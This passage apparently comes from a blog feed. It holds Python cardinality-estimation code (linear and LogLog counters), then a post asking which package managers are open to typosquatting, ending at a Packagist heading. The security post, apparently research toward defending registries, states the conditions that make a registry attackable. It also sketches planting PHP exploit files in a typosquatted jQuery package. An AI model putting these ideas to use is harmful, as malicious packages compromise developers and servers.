<p>The idea behind the linear counter is to use a bitmask of length <code>m</code>, where <code>m</code> is chosen to be around <code>m = n/5</code>. Then we use a hash function <code>h</code> that maps every element to an index between <code>0</code> and <code>m - 1</code>. Whenever an element arrives from the stream, we hash it and set the bit at the resulting index of the bitmask. To estimate the cardinality, we compute <code>-m * ln((m - sum(bitmask)) / m)</code>, where <code>sum(bitmask)</code> is the number of set bits. This approach is implemented in the following Python code:</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/env python3</span>
<span class="kn">import</span> <span class="nn">random</span>
<span class="kn">import</span> <span class="nn">math</span>
<span class="kn">from</span> <span class="nn">stream</span> <span class="kn">import</span> <span class="n">Stream</span>
<span class="k">class</span> <span class="nc">CardinalityCounter</span><span class="p">:</span>
    <span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">m</span><span class="p">):</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">m</span> <span class="o">=</span> <span class="n">m</span>
        <span class="c1"># simulate the bitmask by using</span>
        <span class="c1"># a list with length m</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">bitmask</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">m</span> <span class="o">*</span> <span class="p">[</span><span class="mi">0</span><span class="p">]</span>
    <span class="k">def</span> <span class="nf">hash</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">value</span><span class="p">):</span>
        <span class="n">evenly_distributed</span> <span class="o">=</span> <span class="n">value</span> <span class="o">*</span> <span class="mi">19441</span> <span class="o">+</span> <span class="mi">73877</span>
        <span class="k">return</span> <span class="n">evenly_distributed</span> <span class="o">%</span> <span class="bp">self</span><span class="o">.</span><span class="n">m</span>
    <span class="k">def</span> <span class="nf">add</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">value</span><span class="p">):</span>
        <span class="n">hvalue</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">hash</span><span class="p">(</span><span class="n">value</span><span class="p">)</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">bitmask</span><span class="p">[</span><span class="n">hvalue</span><span class="p">]</span> <span class="o">=</span> <span class="mi">1</span>
    <span class="k">def</span> <span class="nf">get_cardinality</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="sd">"""</span>
<span class="sd">        Estimates the cardinality.</span>
<span class="sd">        """</span>
        <span class="n">weight</span> <span class="o">=</span> <span class="nb">sum</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">bitmask</span><span class="p">)</span>
        <span class="k">if</span> <span class="bp">self</span><span class="o">.</span><span class="n">m</span> <span class="o">==</span> <span class="n">weight</span><span class="p">:</span>
            <span class="k">raise</span> <span class="ne">Exception</span><span class="p">(</span><span class="s1">'Cannot estimate cardinality, weight equals m'</span><span class="p">)</span>
        <span class="k">return</span> <span class="o">-</span><span class="bp">self</span><span class="o">.</span><span class="n">m</span> <span class="o">*</span> <span class="n">math</span><span class="o">.</span><span class="n">log</span><span class="p">((</span><span class="bp">self</span><span class="o">.</span><span class="n">m</span> <span class="o">-</span> <span class="n">weight</span><span class="p">)</span> <span class="o">/</span> <span class="bp">self</span><span class="o">.</span><span class="n">m</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
    <span class="n">n</span> <span class="o">=</span> <span class="mi">100000</span>
    <span class="n">randrange</span> <span class="o">=</span> <span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">1000000</span><span class="p">)</span>
    <span class="n">m</span> <span class="o">=</span> <span class="mi">25000</span>
    <span class="n">s</span> <span class="o">=</span> <span class="n">Stream</span><span class="p">(</span><span class="n">n</span><span class="p">,</span> <span class="n">randrange</span><span class="p">)</span>
    <span class="n">c</span> <span class="o">=</span> <span class="n">CardinalityCounter</span><span class="p">(</span><span class="n">m</span><span class="p">)</span>
    <span class="n">real_cardinality</span> <span class="o">=</span> <span class="nb">set</span><span class="p">()</span>
    <span class="k">for</span> <span class="n">a</span> <span class="ow">in</span> <span class="n">s</span><span class="o">.</span><span class="n">produce</span><span class="p">():</span>
        <span class="n">c</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">a</span><span class="p">)</span>
        <span class="n">real_cardinality</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">a</span><span class="p">)</span>
    <span class="n">real</span><span class="p">,</span> <span class="n">est</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">real_cardinality</span><span class="p">),</span> <span class="n">c</span><span class="o">.</span><span class="n">get_cardinality</span><span class="p">()</span>
    <span class="n">error</span> <span class="o">=</span> <span class="nb">abs</span><span class="p">(</span><span class="mi">1</span> <span class="o">-</span> <span class="p">(</span><span class="nb">float</span><span class="p">(</span><span class="n">real</span><span class="p">)</span><span class="o">/</span><span class="n">est</span><span class="p">))</span> <span class="o">*</span> <span class="mi">100</span>
    <span class="nb">print</span><span class="p">(</span><span class="s1">'Load factor is '</span><span class="p">,</span> <span class="n">n</span><span class="o">/</span><span class="n">m</span><span class="p">)</span>
    <span class="nb">print</span><span class="p">(</span><span class="s1">'Estimated cardinality is '</span><span class="p">,</span> <span class="n">est</span><span class="p">)</span>
    <span class="nb">print</span><span class="p">(</span><span class="s1">'Real cardinality is '</span><span class="p">,</span> <span class="n">real</span><span class="p">)</span>
    <span class="nb">print</span><span class="p">(</span><span class="s1">'Error is: </span><span class="si">{0:.2f}</span><span class="s1">%'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">error</span><span class="p">))</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
    <span class="n">main</span><span class="p">()</span>
</code></pre></div>
<p>The problem with this approach is that it still consumes <code>O(n)</code> space, although much less than the trivial counter implementation, because we use only around <code>n/5</code> <strong>bits</strong> (instead of n * 4 <strong>bytes</strong> in the trivial algorithm). But we can do much better.</p>
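<p>The listing above simulates the bitmask with a Python list, which spends far more than one bit per slot. To make the "bits instead of bytes" argument concrete, here is a minimal sketch of the same estimator backed by a <code>bytearray</code>, so that the storage really is about <code>m</code> bits. The class name <code>BitLinearCounter</code> is my own, and the toy hash is simply carried over from the listing above; any uniformly distributing hash would do.</p>

```python
import math


class BitLinearCounter:
    """Linear counter storing its bitmask in m bits (illustrative sketch)."""

    def __init__(self, m):
        self.m = m
        # one byte holds eight slots of the bitmask
        self.bits = bytearray((m + 7) // 8)

    def _index(self, value):
        # same toy hash as in the listing above
        return (value * 19441 + 73877) % self.m

    def add(self, value):
        i = self._index(value)
        self.bits[i >> 3] |= 1 << (i & 7)

    def estimate(self):
        set_bits = sum(bin(byte).count('1') for byte in self.bits)
        empty = self.m - set_bits
        if empty == 0:
            raise ValueError('bitmask is saturated, choose a larger m')
        return -self.m * math.log(empty / self.m)


if __name__ == '__main__':
    import random
    counter = BitLinearCounter(25000)
    seen = set()
    for _ in range(20000):
        value = random.randrange(1, 1000000)
        counter.add(value)
        seen.add(value)
    print('bytes used by the bitmask:', len(counter.bits))
    print('real:', len(seen), 'estimated:', round(counter.estimate()))
```

<p>With <code>m = 25000</code> the bitmask occupies 3125 bytes, regardless of how many elements pass through the counter.</p>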
<h3>LogLog Counter</h3>
<p>The idea behind the LogLog counter is very beautiful: whenever an element arrives from the data stream, we apply a hash function to it and view the hash value as a bit string. In the example below, the hash value is only one byte long. In real-life applications, it would be much longer.</p>
<div class="highlight"><pre><span></span><code><span class="n">Element</span><span class="w"> </span><span class="mi">534</span><span class="w"> </span><span class="n">arrives</span><span class="o">:</span><span class="w"> </span><span class="n">h</span><span class="p">(</span><span class="mi">534</span><span class="p">)</span><span class="w"> </span><span class="o">-></span><span class="w"> </span><span class="mo">00110011</span><span class="w"></span>
<span class="n">Element</span><span class="w"> </span><span class="mi">44</span><span class="w"> </span><span class="n">arrives</span><span class="o">:</span><span class="w"> </span><span class="n">h</span><span class="p">(</span><span class="mi">44</span><span class="p">)</span><span class="w"> </span><span class="o">-></span><span class="w"> </span><span class="mi">10110010</span><span class="w"></span>
<span class="n">Element</span><span class="w"> </span><span class="mi">75</span><span class="w"> </span><span class="n">arrives</span><span class="o">:</span><span class="w"> </span><span class="n">h</span><span class="p">(</span><span class="mi">75</span><span class="p">)</span><span class="w"> </span><span class="o">-></span><span class="w"> </span><span class="mi">11000110</span><span class="w"></span>
<span class="p">...</span><span class="w"></span>
<span class="n">Element</span><span class="w"> </span><span class="n">n</span><span class="w"> </span><span class="n">arrives</span><span class="o">:</span><span class="w"> </span><span class="n">h</span><span class="p">(</span><span class="n">n</span><span class="p">)</span><span class="w"> </span><span class="o">-></span><span class="w"> </span><span class="n">x</span><span class="w"></span>
</code></pre></div>
<p>If the hash function distributes bits uniformly (as every good hash function should), we can expect that</p>
<div class="highlight"><pre><span></span><code><span class="mf">1</span><span class="o">/</span><span class="mf">2</span><span class="w"> </span><span class="n">of</span><span class="w"> </span><span class="n">all</span><span class="w"> </span><span class="n">hash</span><span class="w"> </span><span class="nb">val</span><span class="n">ues</span><span class="w"> </span><span class="n">begin</span><span class="w"> </span><span class="n">with</span><span class="w"> </span><span class="n">an</span><span class="w"> </span><span class="mf">1</span><span class="p">:</span><span class="w"> </span><span class="mf">1.......</span><span class="w"></span>
<span class="mf">1</span><span class="o">/</span><span class="mf">4</span><span class="w"> </span><span class="n">of</span><span class="w"> </span><span class="n">all</span><span class="w"> </span><span class="n">hash</span><span class="w"> </span><span class="nb">val</span><span class="n">ues</span><span class="w"> </span><span class="n">begin</span><span class="w"> </span><span class="n">with</span><span class="w"> </span><span class="n">an</span><span class="w"> </span><span class="mf">01</span><span class="p">:</span><span class="w"> </span><span class="mf">01......</span><span class="w"></span>
<span class="mf">1</span><span class="o">/</span><span class="mf">8</span><span class="w"> </span><span class="n">of</span><span class="w"> </span><span class="n">all</span><span class="w"> </span><span class="n">hash</span><span class="w"> </span><span class="nb">val</span><span class="n">ues</span><span class="w"> </span><span class="n">begin</span><span class="w"> </span><span class="n">with</span><span class="w"> </span><span class="n">an</span><span class="w"> </span><span class="mf">001</span><span class="p">:</span><span class="w"> </span><span class="mf">001.....</span><span class="w"></span>
<span class="mf">...</span><span class="w"></span>
<span class="mf">1</span><span class="o">/</span><span class="mf">2</span><span class="o">^</span><span class="n">k</span><span class="w"> </span><span class="n">of</span><span class="w"> </span><span class="n">all</span><span class="w"> </span><span class="n">hash</span><span class="w"> </span><span class="nb">val</span><span class="n">ues</span><span class="w"> </span><span class="n">begin</span><span class="w"> </span><span class="n">with</span><span class="w"> </span><span class="mf">0000...1</span><span class="w"></span>
</code></pre></div>
<p>The position of the first <code>1</code> in the binary representation of the hash value is defined as the rank of the hash value.</p>
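<p>The expected fractions listed above can be checked empirically. The following is a small sketch, not part of the counter itself: it hashes a range of integers with <code>md5</code>, computes the rank of each hash value, and compares the observed share of each rank with <code>1/2^k</code>. The helper names <code>hash_bits</code>, <code>rank</code> and <code>rank_histogram</code> are assumptions made for this illustration.</p>

```python
import hashlib
from collections import Counter


def hash_bits(value, width=32):
    """First `width` bits of md5(str(value)) as a string of '0' and '1'."""
    digest = hashlib.md5(str(value).encode('utf-8')).digest()
    as_int = int.from_bytes(digest, 'big')
    return '{0:0128b}'.format(as_int)[:width]


def rank(bits):
    """1-based position of the first '1'; len(bits) if there is none."""
    position = bits.find('1')
    return position + 1 if position != -1 else len(bits)


def rank_histogram(values, width=32):
    """Count how often each rank occurs among the hashed values."""
    return Counter(rank(hash_bits(v, width)) for v in values)


if __name__ == '__main__':
    total = 100000
    histogram = rank_histogram(range(total))
    for r in range(1, 6):
        print('rank {}: observed {:.4f}, expected {:.4f}'.format(
            r, histogram[r] / total, 0.5 ** r))
```

<p>Because high ranks are exponentially rare, observing one is evidence that many distinct elements have passed by.</p>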
<p>We can use this fact about uniform distributions to our advantage: we create <code>m</code> buckets. For every element of the stream, we determine its bucket from the first <code>log2(m)</code> bits of the hash value. From the remaining bits, we compute the rank. We update the bucket with this rank only if it is higher than the rank currently stored there, so each of the <code>m</code> buckets ends up holding the highest rank it has seen. If some bucket stores the rank <code>r</code>, for example <code>r = 10</code>, then we can expect that roughly <code>2^r</code> distinct elements have been routed to that bucket. This beautiful idea is implemented in the Python code below. As a hash function, we chose <code>md5</code>. It is definitely not the best choice, since it is a cryptographic hash function and thus relatively slow.</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/env python3</span>
<span class="kn">import</span> <span class="nn">random</span>
<span class="kn">import</span> <span class="nn">math</span>
<span class="kn">import</span> <span class="nn">hashlib</span>
<span class="kn">import</span> <span class="nn">numpy</span> <span class="k">as</span> <span class="nn">np</span>
<span class="kn">from</span> <span class="nn">stream</span> <span class="kn">import</span> <span class="n">Stream</span>
<span class="n">np</span><span class="o">.</span><span class="n">set_printoptions</span><span class="p">(</span><span class="n">threshold</span><span class="o">=</span><span class="n">np</span><span class="o">.</span><span class="n">inf</span><span class="p">)</span>
<span class="k">class</span> <span class="nc">LogLogCounter</span><span class="p">:</span>
    <span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">H</span><span class="p">,</span> <span class="n">k</span><span class="p">,</span> <span class="n">etype</span><span class="o">=</span><span class="mi">8</span><span class="p">,</span> <span class="n">n</span><span class="o">=</span><span class="mi">100000</span><span class="p">):</span>
        <span class="sd">"""</span>
<span class="sd">        H: length of hash function in bits</span>
<span class="sd">        k: number of bits that determine bucket</span>
<span class="sd">        etype: number of bits for each estimator (Not used yet)</span>
<span class="sd">        """</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">H</span> <span class="o">=</span> <span class="n">H</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">k</span> <span class="o">=</span> <span class="n">k</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">etype</span> <span class="o">=</span> <span class="n">etype</span> <span class="c1"># currently ignored</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">m</span> <span class="o">=</span> <span class="mi">2</span><span class="o">**</span><span class="bp">self</span><span class="o">.</span><span class="n">k</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">estimators</span> <span class="o">=</span> <span class="n">np</span><span class="o">.</span><span class="n">zeros</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">m</span><span class="p">,</span> <span class="n">dtype</span><span class="o">=</span><span class="n">np</span><span class="o">.</span><span class="n">int8</span><span class="p">)</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">hash_func_len</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">math</span><span class="o">.</span><span class="n">log</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">m</span><span class="p">,</span> <span class="mi">2</span><span class="p">)</span> <span class="o">+</span> <span class="n">math</span><span class="o">.</span><span class="n">floor</span><span class="p">(</span><span class="n">math</span><span class="o">.</span><span class="n">log</span><span class="p">(</span><span class="n">n</span><span class="o">/</span><span class="bp">self</span><span class="o">.</span><span class="n">m</span><span class="p">)</span> <span class="o">+</span> <span class="mi">3</span><span class="p">))</span>
    <span class="k">def</span> <span class="nf">hash</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">value</span><span class="p">):</span>
        <span class="sd">"""</span>
<span class="sd">        hashes the value and returns a 128 bit long bitstring.</span>
<span class="sd">        md5 is used, other hash functions might also work.</span>
<span class="sd">        """</span>
        <span class="n">m</span> <span class="o">=</span> <span class="n">hashlib</span><span class="o">.</span><span class="n">md5</span><span class="p">()</span>
        <span class="c1"># hash the decimal representation; bytes(value) would allocate value zero bytes</span>
        <span class="n">m</span><span class="o">.</span><span class="n">update</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">value</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span>
        <span class="n">h</span> <span class="o">=</span> <span class="n">m</span><span class="o">.</span><span class="n">hexdigest</span><span class="p">()</span>
        <span class="k">return</span> <span class="s1">'</span><span class="si">{0:0128b}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">h</span><span class="p">,</span> <span class="mi">16</span><span class="p">))</span>
    <span class="k">def</span> <span class="nf">get_bits</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">value</span><span class="p">,</span> <span class="n">start</span><span class="p">,</span> <span class="n">end</span><span class="p">,</span> <span class="n">number</span><span class="o">=</span><span class="kc">False</span><span class="p">):</span>
        <span class="sd">"""</span>
<span class="sd">        Get a number from the bitstring specified by the range</span>
<span class="sd">        from start to end.</span>
<span class="sd">        """</span>
        <span class="n">s</span> <span class="o">=</span> <span class="n">value</span><span class="p">[</span><span class="n">start</span><span class="p">:</span><span class="n">end</span><span class="p">]</span>
        <span class="k">if</span> <span class="n">number</span><span class="p">:</span>
            <span class="k">return</span> <span class="nb">int</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="mi">2</span><span class="p">)</span>
        <span class="k">else</span><span class="p">:</span>
            <span class="k">return</span> <span class="n">s</span>
    <span class="k">def</span> <span class="nf">rank</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">value</span><span class="p">):</span>
        <span class="sd">"""</span>
<span class="sd">        Find the position of the first '1' bit in the hash value.</span>
<span class="sd">        100...b has rank 1</span>
<span class="sd">        001...b has rank 3</span>
<span class="sd">        0000001...b has rank 7</span>
<span class="sd">        """</span>
        <span class="k">try</span><span class="p">:</span>
            <span class="k">return</span> <span class="n">value</span><span class="o">.</span><span class="n">index</span><span class="p">(</span><span class="s1">'1'</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span>
        <span class="k">except</span> <span class="ne">ValueError</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
            <span class="k">return</span> <span class="nb">len</span><span class="p">(</span><span class="n">value</span><span class="p">)</span>
    <span class="k">def</span> <span class="nf">add</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">value</span><span class="p">):</span>
        <span class="n">hashed</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">hash</span><span class="p">(</span><span class="n">value</span><span class="p">)</span>
        <span class="n">bucket</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">get_bits</span><span class="p">(</span><span class="n">hashed</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">k</span><span class="p">,</span> <span class="n">number</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">estimators</span><span class="p">[</span><span class="n">bucket</span><span class="p">]</span> <span class="o">=</span> <span class="nb">max</span><span class="p">(</span>
            <span class="bp">self</span><span class="o">.</span><span class="n">estimators</span><span class="p">[</span><span class="n">bucket</span><span class="p">],</span>
            <span class="bp">self</span><span class="o">.</span><span class="n">rank</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">get_bits</span><span class="p">(</span><span class="n">hashed</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">k</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">H</span><span class="p">))</span>
        <span class="p">)</span>
    <span class="k">def</span> <span class="nf">estimate_cardinality</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="n">est_factor</span> <span class="o">=</span> <span class="mf">0.39701</span>
        <span class="n">power</span> <span class="o">=</span> <span class="p">(</span><span class="mf">1.0</span><span class="o">/</span><span class="bp">self</span><span class="o">.</span><span class="n">m</span><span class="p">)</span> <span class="o">*</span> <span class="bp">self</span><span class="o">.</span><span class="n">estimators</span><span class="o">.</span><span class="n">sum</span><span class="p">()</span>
        <span class="n">est</span> <span class="o">=</span> <span class="n">est_factor</span> <span class="o">*</span> <span class="bp">self</span><span class="o">.</span><span class="n">m</span> <span class="o">*</span> <span class="mi">2</span><span class="o">**</span><span class="n">power</span>
        <span class="k">return</span> <span class="nb">int</span><span class="p">(</span><span class="n">est</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
    <span class="n">n</span> <span class="o">=</span> <span class="mi">100000</span>
    <span class="n">randrange</span> <span class="o">=</span> <span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">1000000</span><span class="p">)</span>
    <span class="n">s</span> <span class="o">=</span> <span class="n">Stream</span><span class="p">(</span><span class="n">n</span><span class="p">,</span> <span class="n">randrange</span><span class="p">)</span>
    <span class="n">real_card</span> <span class="o">=</span> <span class="nb">set</span><span class="p">()</span>
    <span class="n">loglogc</span> <span class="o">=</span> <span class="n">LogLogCounter</span><span class="p">(</span><span class="mi">128</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="n">n</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">a</span> <span class="ow">in</span> <span class="n">s</span><span class="o">.</span><span class="n">produce</span><span class="p">():</span>
        <span class="n">loglogc</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">a</span><span class="p">)</span>
        <span class="n">real_card</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">a</span><span class="p">)</span>
    <span class="n">real</span><span class="p">,</span> <span class="n">est</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">real_card</span><span class="p">),</span> <span class="n">loglogc</span><span class="o">.</span><span class="n">estimate_cardinality</span><span class="p">()</span>
    <span class="n">error</span> <span class="o">=</span> <span class="nb">abs</span><span class="p">(</span><span class="mi">1</span> <span class="o">-</span> <span class="p">(</span><span class="nb">float</span><span class="p">(</span><span class="n">real</span><span class="p">)</span><span class="o">/</span><span class="n">est</span><span class="p">))</span> <span class="o">*</span> <span class="mi">100</span>
    <span class="nb">print</span><span class="p">(</span><span class="s1">'Real cardinality=</span><span class="si">{}</span><span class="s1"> and estimated cardinality=</span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">real</span><span class="p">,</span> <span class="n">est</span><span class="p">))</span>
    <span class="nb">print</span><span class="p">(</span><span class="s1">'Error is: </span><span class="si">{0:.2f}</span><span class="s1">%'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">error</span><span class="p">))</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
    <span class="n">main</span><span class="p">()</span>
</code></pre></div>What other package managers are vulnerable to typo squatting attacks?2016-06-30T17:58:00+02:002016-06-30T21:56:00+02:00Nikolai Tschachertag:incolumitas.com,2016-06-30:/2016/06/30/what-other-package-managers-are-vulnerable-to-typosquatting/<p>In my last blog post about <a href="https://incolumitas.com/2016/06/08/typosquatting-package-managers/">typosquatting package managers</a> I discussed my findings about attacking the programming language package managers from <em>rubygems.org, PyPi</em> and <em>npmjs.com</em>.</p>
<p>That post generated quite some interest, and people subsequently asked whether <strong>other package managers
might also be vulnerable to this hybrid attack</strong> (typosquatting combines a technical and a psychological attack vector). While writing my thesis, I encountered several other package managers. The <a href="https://github.com/showcases/package-managers">GitHub showcase page</a> about package managers gives a very good overview of some of the most recent ones; it is summarized in the table below:</p>
<table>
<thead>
<tr>
<th>Package Manager Name</th>
<th># of Stars on Github</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://github.com/bower/bower">bower/bower</a></td>
<td>14257</td>
</tr>
<tr>
<td><a href="https://github.com/VundleVim/Vundle.vim">VundleVim/Vundle.vim</a></td>
<td>11969</td>
</tr>
<tr>
<td><a href="https://github.com/npm/npm">npm/npm</a></td>
<td>9664</td>
</tr>
<tr>
<td><a href="https://github.com/alcatraz/Alcatraz">alcatraz/Alcatraz</a></td>
<td>8936</td>
</tr>
<tr>
<td><a href="https://github.com/CocoaPods/CocoaPods">CocoaPods/CocoaPods</a></td>
<td>8115</td>
</tr>
<tr>
<td><a href="https://github.com/composer/composer">composer/composer</a></td>
<td>7909</td>
</tr>
<tr>
<td><a href="https://github.com/Carthage/Carthage">Carthage/Carthage</a></td>
<td>7160</td>
</tr>
<tr>
<td><a href="https://github.com/jordansissel/fpm">jordansissel/fpm</a></td>
<td>6722</td>
</tr>
<tr>
<td><a href="https://github.com/componentjs/component">componentjs/component</a></td>
<td>4503</td>
</tr>
<tr>
<td><a href="https://github.com/apple/swift-package-manager">apple/swift-package-manager</a></td>
<td>4318</td>
</tr>
<tr>
<td><a href="https://github.com/wbond/package_control">wbond/package_control</a></td>
<td>3018</td>
</tr>
<tr>
<td><a href="https://github.com/pypa/pip">pypa/pip</a></td>
<td>2911</td>
</tr>
<tr>
<td><a href="https://github.com/chocolatey/chocolatey">chocolatey/chocolatey</a></td>
<td>2741</td>
</tr>
<tr>
<td><a href="https://github.com/Masterminds/glide">Masterminds/glide</a></td>
<td>2163</td>
</tr>
<tr>
<td><a href="https://github.com/tmux-plugins/tpm">tmux-plugins/tpm</a></td>
<td>1961</td>
</tr>
<tr>
<td><a href="https://github.com/Homebrew/brew">Homebrew/brew</a></td>
<td>1757</td>
</tr>
<tr>
<td><a href="https://github.com/rust-lang/cargo">rust-lang/cargo</a></td>
<td>1705</td>
</tr>
<tr>
<td><a href="https://github.com/rubygems/rubygems">rubygems/rubygems</a></td>
<td>1547</td>
</tr>
<tr>
<td><a href="https://github.com/caolan/jam">caolan/jam</a></td>
<td>1540</td>
</tr>
<tr>
<td><a href="https://github.com/volojs/volo">volojs/volo</a></td>
<td>1326</td>
</tr>
<tr>
<td><a href="https://github.com/gpmgo/gopm">gpmgo/gopm</a></td>
<td>1027</td>
</tr>
<tr>
<td><a href="https://github.com/spmjs/spm">spmjs/spm</a></td>
<td>882</td>
</tr>
<tr>
<td><a href="https://github.com/atom/apm">atom/apm</a></td>
<td>690</td>
</tr>
<tr>
<td><a href="https://github.com/freshshell/fresh">freshshell/fresh</a></td>
<td>674</td>
</tr>
<tr>
<td><a href="https://github.com/ruslo/hunter">ruslo/hunter</a></td>
<td>436</td>
</tr>
<tr>
<td><a href="https://github.com/ocaml/opam">ocaml/opam</a></td>
<td>425</td>
</tr>
<tr>
<td><a href="https://github.com/NuGet/Home">NuGet/Home</a></td>
<td>367</td>
</tr>
</tbody>
</table>
<p>The obvious question now is: how many of those package managers are vulnerable to typosquatting attacks? In my last post, I stated three requirements that need to be fulfilled for a package repository to be vulnerable to typosquatting attacks. Those were:</p>
<ol>
<li>The possibility of registering <strong>any package name and uploading code without any hard costs</strong> such as providing a real identity or registering a domain name.</li>
<li>The feasibility of <strong>achieving code execution upon package installation</strong> on the host system. This requirement is not strictly necessary, since code may also be executed when the typo package is eventually imported.</li>
<li>Accessibility and presence of <strong>good documentation</strong> for uploading and distributing packages
on the package repository. Plus: a gentle learning curve, so that a demo program in the target programming language can be developed quickly.</li>
</ol>
<h2>Package managers that are not vulnerable</h2>
<p>A good approach seems to be studying package managers that were found not to be vulnerable to typosquatting attacks and identifying
the critical differences that make one package manager attackable and another not. In my thesis, I initially wanted to also attack the repositories</p>
<ul>
<li><a href="https://bower.io/">Bower</a></li>
<li><a href="https://packagist.org/">Packagist</a></li>
<li><a href="http://www.cpan.org/">CPAN</a></li>
</ul>
<p>but found good reasons, and obstacles, not to include them in my attack.</p>
<h4>Bower</h4>
<p>There is a <a href="https://github.com/bower/bower/issues/249">long discussion on GitHub</a> about whether to allow pre- and post-install hooks similar to the ones used in <em>npm</em>. In that discussion, <strong>Sheerun</strong> commented on <em>Apr 16, 2014</em>:</p>
<blockquote>
<p>This is utterly wrong idea... Allowing postinstall raises serious security issues. With them anyone is able to run arbitrary code on your computer and on your production machines... That's why it's impossible in tools like git to commit any hooks to repository. Bower is git of web.</p>
<p>This is especially dangerous in case of bower as it doesn't use any checksums, or packaging. A lot of people are depending on branches which can change in any moment (as well as tags btw.).</p>
<p>As @necolas pointed out postinstall is also useless to post-process files as user environment is unknown and unpredictable. Bower is going to have publish command so pre-publish hook will be ok.</p>
<p>If hooks are implemented, they should be immediately reverted and deprecated.</p>
</blockquote>
<p><strong>Sheerun</strong> also mentioned:</p>
<blockquote>
<p>If anyone want to compare with npm:</p>
<p>With npm post-install is more acceptable (still bad idea) because you can't avoid executing javascript files on server. Bower is different story as packages are executed only in web browser. Also npm has checksums, packaged packages, projects like https://nodesecurity.io/.</p>
<p>Moreover bower is used not only by node projects. This "feature" makes any project using bower directly vulnerable (like https://github.com/42dev/bower-rails or https://github.com/d-i/half-pipe or bower CDNs).</p>
</blockquote>
<p>This comment explains exactly why a package manager shouldn't have pre/post-install functionality. Additionally, there are a few points that make <em>Bower</em> a very attractive target for an attack:</p>
<ul>
<li>
<p>The Bower registry does not have authentication or user management at this point in time. It’s on a first come, first served basis.</p>
</li>
<li>
<p>Bower doesn’t support GitHub-style namespacing (org/repo)</p>
</li>
</ul>
<p>While I didn't find a way to achieve code execution at installation time in <em>Bower</em>, it is perfectly possible to spread typosquatted packages that contain files other than the intended front-end files (such as <em>.css, .js or .html</em> files). Just imagine bypassing security by typosquatting the popular <em>jQuery</em> library and adding some PHP files with exploit code that is triggered as soon as the manipulated <em>jQuery</em> library is loaded in a browser. This exploits the fact that libraries installed via <em>Bower</em> often find their way onto servers, where such files can be interpreted by a server-side scripting language if the web server is configured accordingly.</p>
<h4>CPAN</h4>
<p>The <em>CPAN</em> ecosystem was simply too complex and cumbersome to try to attack. The declining popularity of <em>CPAN</em> and Perl in recent years was another reason to exclude it from my research. It might be the case that <em>CPAN</em> is vulnerable to typosquatting attacks. Can anyone familiar with the Perl ecosystem confirm this?</p>
<h4>Packagist (PHP)</h4>
